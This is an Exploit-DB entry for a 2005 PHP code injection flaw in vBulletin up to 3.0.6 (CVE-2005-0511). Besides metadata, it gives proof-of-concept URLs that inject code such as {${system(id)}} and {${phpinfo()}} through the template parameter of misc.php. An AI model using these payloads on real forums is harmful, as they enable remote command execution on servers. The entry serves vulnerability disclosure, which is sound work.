vBulletin <= 3.0.6 php Code Injection
| EDB-ID: 832 | CVE: 2005-0511 | OSVDB-ID: 14047 |
| Author: pokley | Published: 2005-02-22 | Verified:  |
Exploit Code:  |
Vulnerable App: N/A |
Rating |
| EDB-ID: 832 | CVE: 2005-0511 | OSVDB-ID: 14047 |
| Author: pokley | Published: 2005-02-22 | Verified: |
| Exploit Code: |
Vulnerable App: N/A |
Rating |
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
# milw0rm.com [2005-02-22]